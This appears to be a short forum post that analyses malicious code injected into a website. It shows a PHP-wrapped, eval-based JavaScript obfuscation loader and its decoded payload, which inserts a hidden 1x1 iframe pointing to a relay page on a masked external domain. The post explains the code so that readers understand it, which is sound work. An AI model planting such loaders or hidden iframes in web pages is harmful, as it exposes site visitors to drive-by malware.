Just to show you what this script does as it's always interesting the obfuscation techniques people use.
<?
#68c8c7# echo " <script type=\"text/javascript\" language=\"javascript\" >
asgq=[0x72,0x65,0x6c,0x61,...0x28,0x29,0x3b];
try{document.body|=1} catch(gdsgsdg){
// Some attempt of obfuscation
zz=3;
dbshre=34;
if(dbshre){
vfvwe=0;
// Some attempt of obfuscation
try{} catch(agdsg) {
vfvwe=1;
}
if(!vfvwe){
// This is the Eval Function
e=window[\"eval\"];
}
s=\"\";
for(i=0;i-499!=0;i++){
if(window.document) {
// Add encoded script (asgg) to variable s.
s+=String.fromCharCode(asgq[i]);
}
}
// Some attempt of obfuscation
z=s;
// 'e' is the eval function which was defined above.
e(s);
}
}
</script>";
#/68c8c7#
?>
And the 'asgq' variable had the following code:
(function () { var yokdj = document.createElement('iframe');
(function () {
var yokdj = document.createElement('iframe');
yokdj.src = 'http://*********.nl/relay.php';
yokdj.style.position = 'absolute';
yokdj.style.border = '0';
yokdj.style.height = '1px';
yokdj.style.width = '1px';
yokdj.style.left = '1px';
yokdj.style.top = '1px';
if (!document.getElementById('yokdj')) {
document.write('<div id=\'yokdj\'></div>');
document.getElementById('yokdj').appendChild(yokdj);
}
})();
})();
I have taken out the URL as I don't think it's a good idea for people to be going to websites that may contain malware.
